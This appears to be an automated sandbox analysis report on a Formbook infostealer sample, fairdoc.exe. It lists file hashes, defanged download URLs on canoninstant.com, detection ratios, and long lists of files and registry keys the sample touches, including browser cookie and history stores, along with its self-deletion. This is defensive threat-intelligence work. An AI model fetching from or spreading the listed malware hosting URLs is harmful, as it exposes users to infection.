MalScore
100/100
MalFamily
Formbook

fairdoc.exe

Is DLL Packer Anti Debug Anti VM Signed XOR AntiVirus 49/66
File details Download PDF Report
File type: PE32 executable (GUI) Intel 80386, for MS Windows
File size: 167.50 KB (171520 bytes)
Compile time: 2006-07-30 04:18:22
MD5: 316d90aa07e5282ce765f212ab26c7f5
SHA1: 65e4dee5aa409f44657a3f3cb3bf99fd5846fe1c
SHA256: 96920ba7e70b2b945030b53fc09d6b28eee4c3b77fdb1c09faf60698e080435f
Sections 1 .text
Anti Virtual Machine 1 VMCheck.dll
First submission: 2018-11-13 00:09:04
Last submission: 2018-11-23 10:30:03
Filename detected: - fairdoc.exe (4)
URL file hosting
hXXp://canoninstant.com/music/fairdoc.exeVirusTotal
hXXp://canoninstant.com/Carlitoma/fairdoc.exeVirusTotal
hXXp://canoninstant.com/carlitos/fairdoc.exeVirusTotal
hXXp://canoninstant.com/LOVER/fairdoc.exeVirusTotal
Antivirus Report
Report Date Detection Ratio Permalink Update
2018-11-12 20:00:33 [49/66] VirusTotal
PE Sections 1 suspicious
Name VAddress VSize Size MD5 SHA1
.text 0x1000 0x28a30 166912 1b5ae1990bcd400b0ad61201bc53ebb2 613607c4b47bff7ad1aeb14c3f61ffc77dc5648b
Meta Info
No Meta found in this file
XOR
No XOR informations found in this file.
Signature
This file isn't digitally signed
Packer(s)
Borland Delphi 3.0 (???)
File found
No file name detected
IP Found
No IP detected
URL(s)
No URL found
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven04_64 Seven04_64 VirtualBox 2018-11-13 00:04:33 2018-11-13 00:07:33 180

12 Behaviors detected by system signatures

Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven04_64 Seven04_64 VirtualBox 2018-11-13 00:04:33 2018-11-13 00:07:33 180

11 Summary items with data

Files

C:\Windows\SysWOW64\ntdll.dll
\Device\KsecDD
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\desktop.ini
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat
C:\Windows\SysWOW64\systray.exe.Local\
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Users\Seven01\AppData\Roaming\K3582CR8\K35logim.jpeg
C:\Users\Seven01\AppData\Local\Temp
C:\Users
C:\Users\Seven01
C:\Users\Seven01\AppData
C:\Users\Seven01\AppData\Local
C:\
C:\Users\Seven01\AppData\Local\Temp\fairdoc.exe
C:\Windows\Temp
C:\Windows\sysnative\LogFiles\Scm\994c86ad-a929-4b2c-88a0-4e25a107a029
C:\Windows\sysnative\LogFiles\Scm\044a6734-e90e-4f8f-b357-b2dc8ab3b5ec
C:\Windows\sysnative\LogFiles\Scm\046fbef8-2dd6-4a92-a08e-608464edcc44
C:\Windows\sysnative\LogFiles\Scm\2f57269b-1e09-4e2d-ab1e-b0fdac7d279c
C:\Windows\sysnative\LogFiles\Scm\47536d45-eeec-4bdc-8183-a4dc1f8da9e4
C:\Windows\sysnative\LogFiles\Scm\5c0aeeea-c154-45be-8499-bea5f11baff6
C:\Windows\sysnative\LogFiles\Scm\a7c73732-9f11-4281-8d19-764d4ec9d94d
C:\Windows\sysnative\LogFiles\Scm\ac4e5acf-89f7-4220-ba21-81ee183975e2
C:\Windows\sysnative\LogFiles\Scm\b4bdb6a0-417f-4e60-a0ac-aa00b1c79b4c
C:\Windows\sysnative\LogFiles\Scm\be669c13-8165-4536-96d0-6d6c39292aae
C:\Windows\sysnative\LogFiles\Scm\c016366b-7126-46ca-b36b-592a3d95a60b
C:\Windows\sysnative\LogFiles\Scm\ca4b8ff2-a4d2-4d88-a52e-3a5bdaf7f56e
C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50
C:\Windows\sysnative\LogFiles\Scm\fb3c354d-297a-4eb2-9b58-090f6361906b
C:\Windows\sysnative\LogFiles\Scm\fdd56c73-f0d5-41b6-b767-6effd7966428
C:\ProgramData\Microsoft\Windows\Sqm\Sessions
C:\ProgramData\Microsoft\Windows\Sqm\Sessions\*.psqm
C:\ProgramData\Microsoft\Windows\Sqm\Upload
C:\ProgramData\Microsoft\Windows\Sqm\Upload\*.sqm
C:\ProgramData\Microsoft\Windows\Sqm\Manifest
C:\ProgramData\Microsoft\Windows\Sqm\Manifest\*.bin
C:\Windows\sysnative\LogFiles\SQM
C:\Windows\sysnative\LogFiles\SQM\SqmLogger*.etl.*
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\sysnative\it-IT\KERNELBASE.dll.mui
C:\Windows\sysnative\Tasks
C:\Windows\sysnative\Tasks\*
C:\Windows\sysnative\Tasks\Adobe Flash Player Updater
C:\Windows\sysnative\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Uploader
C:\Windows\sysnative\advapi32.dll
C:\Windows\sysnative\it-IT\advapi32.dll.mui
C:\Windows\sysnative\drivers\acpi.sys
C:\Windows\sysnative\drivers\it-IT\ACPI.sys.mui
C:\Windows\sysnative\drivers\ndis.sys
C:\Windows\sysnative\drivers\it-IT\ndis.sys.mui
C:\Windows\sysnative\drivers\mssmbios.sys
C:\Windows\sysnative\drivers\it-IT\mssmbios.sys.mui
C:\Windows\sysnative\drivers\hdaudbus.sys
C:\Windows\sysnative\drivers\it-IT\HDAudBus.sys.mui
C:\Windows\sysnative\drivers\intelppm.sys
C:\Windows\sysnative\drivers\it-IT\intelppm.sys.mui
C:\Windows\sysnative\drivers\portcls.sys
C:\Windows\sysnative\drivers\it-IT\portcls.SYS.mui
C:\Windows\sysnative\drivers\monitor.sys
C:\Windows\sysnative\drivers\it-IT\monitor.sys
C:\Windows\sysnative\drivers\it\monitor.sys
\??\MountPointManager
C:\Windows\sysnative\wbem\WMIADAP.exe
C:\Windows
C:\Windows\sysnative
C:\Windows\sysnative\wbem
C:\Windows\appcompat\Programs\RecentFileCache.bcf
C:\Windows\AppPatch\AppPatch64\sysmain.sdb
C:\Windows\sysnative\wbem\
C:\Windows\SysWOW64\net.exe
C:\Windows\SysWOW64
C:\Windows\AppPatch\sysmain.sdb
C:\Windows\SysWOW64\
C:\Windows\SysWOW64\*.*
C:\Windows\SysWOW64\ui\SwDRM.dll
C:\Windows\SysWOW64\net1.exe
C:\Windows\Temp\fwtsqmfile00.sqm
C:\Windows\Temp\fwtsqmfile01.sqm
C:\Windows\SysWOW64\sc.exe
C:\Windows\SysWOW64\it-IT\sc.exe.mui
C:\Windows\sysnative\wlrmdr.exe
C:\Windows\sysnative\
\Device\Ndis
C:\Windows\sysnative\wbem\WmiPrvSE.exe
C:\Windows\sysnative\wbem\Performance\
C:\Windows\sysnative\wbem\Performance\WmiApRpl_new.h

Read Files

C:\Windows\SysWOW64\ntdll.dll
\Device\KsecDD
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Windows\sysnative\LogFiles\Scm\994c86ad-a929-4b2c-88a0-4e25a107a029
C:\Windows\sysnative\LogFiles\Scm\044a6734-e90e-4f8f-b357-b2dc8ab3b5ec
C:\Windows\sysnative\LogFiles\Scm\046fbef8-2dd6-4a92-a08e-608464edcc44
C:\Windows\sysnative\LogFiles\Scm\2f57269b-1e09-4e2d-ab1e-b0fdac7d279c
C:\Windows\sysnative\LogFiles\Scm\47536d45-eeec-4bdc-8183-a4dc1f8da9e4
C:\Windows\sysnative\LogFiles\Scm\5c0aeeea-c154-45be-8499-bea5f11baff6
C:\Windows\sysnative\LogFiles\Scm\a7c73732-9f11-4281-8d19-764d4ec9d94d
C:\Windows\sysnative\LogFiles\Scm\ac4e5acf-89f7-4220-ba21-81ee183975e2
C:\Windows\sysnative\LogFiles\Scm\b4bdb6a0-417f-4e60-a0ac-aa00b1c79b4c
C:\Windows\sysnative\LogFiles\Scm\be669c13-8165-4536-96d0-6d6c39292aae
C:\Windows\sysnative\LogFiles\Scm\c016366b-7126-46ca-b36b-592a3d95a60b
C:\Windows\sysnative\LogFiles\Scm\ca4b8ff2-a4d2-4d88-a52e-3a5bdaf7f56e
C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50
C:\Windows\sysnative\LogFiles\Scm\fb3c354d-297a-4eb2-9b58-090f6361906b
C:\Windows\sysnative\LogFiles\Scm\fdd56c73-f0d5-41b6-b767-6effd7966428
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\sysnative\it-IT\KERNELBASE.dll.mui
C:\Windows\sysnative\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Uploader
C:\Windows\sysnative\advapi32.dll
C:\Windows\sysnative\drivers\acpi.sys
C:\Windows\sysnative\drivers\ndis.sys
C:\Windows\sysnative\drivers\mssmbios.sys
C:\Windows\sysnative\drivers\hdaudbus.sys
C:\Windows\sysnative\drivers\intelppm.sys
C:\Windows\sysnative\drivers\portcls.sys
C:\Windows\sysnative\drivers\monitor.sys
C:\Windows\sysnative\it-IT\advapi32.dll.mui
C:\Windows\sysnative\drivers\it-IT\ACPI.sys.mui
C:\Windows\sysnative\wbem\WMIADAP.exe
C:\Windows\appcompat\Programs\RecentFileCache.bcf
C:\Windows\AppPatch\AppPatch64\sysmain.sdb
C:\Windows\sysnative\wbem\
C:\Windows\SysWOW64\net.exe
C:\Windows\AppPatch\sysmain.sdb
C:\Windows\SysWOW64\
C:\Windows\SysWOW64\net1.exe
C:\Windows\Temp\fwtsqmfile01.sqm
C:\Windows\SysWOW64\sc.exe
C:\Windows\SysWOW64\it-IT\sc.exe.mui
C:\Windows\sysnative\wlrmdr.exe
C:\Windows\sysnative\
\Device\Ndis
C:\Windows\sysnative\wbem\WmiPrvSE.exe

Write Files

C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat
C:\Users\Seven01\AppData\Roaming\K3582CR8\K35logim.jpeg
C:\Windows\sysnative\LogFiles\Scm\c016366b-7126-46ca-b36b-592a3d95a60b
C:\Windows\appcompat\Programs\RecentFileCache.bcf
C:\Windows\Temp\fwtsqmfile01.sqm
\Device\Ndis
C:\Windows\sysnative\wbem\Performance\WmiApRpl_new.h

Delete Files

C:\Users\Seven01\AppData\Local\Temp\fairdoc.exe
C:\Windows\sysnative\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Uploader

Keys

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Signature
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\PerUserItem
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\PerUserItem
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\PerUserItem
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\PerUserItem
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\PerUserItem
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\PerUserItem
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheOptions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheOptions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheOptions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheOptions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CacheOptions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheOptions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheRepair
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CachePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CachePrefix
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheOptions
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\systray.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance
HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance\Disabled
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_USERS\S-1-5-18
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_USERS\.DEFAULT\Environment
HKEY_USERS\.DEFAULT\Volatile Environment
HKEY_USERS\.DEFAULT\Volatile Environment\0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time\Dynamic DST
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc
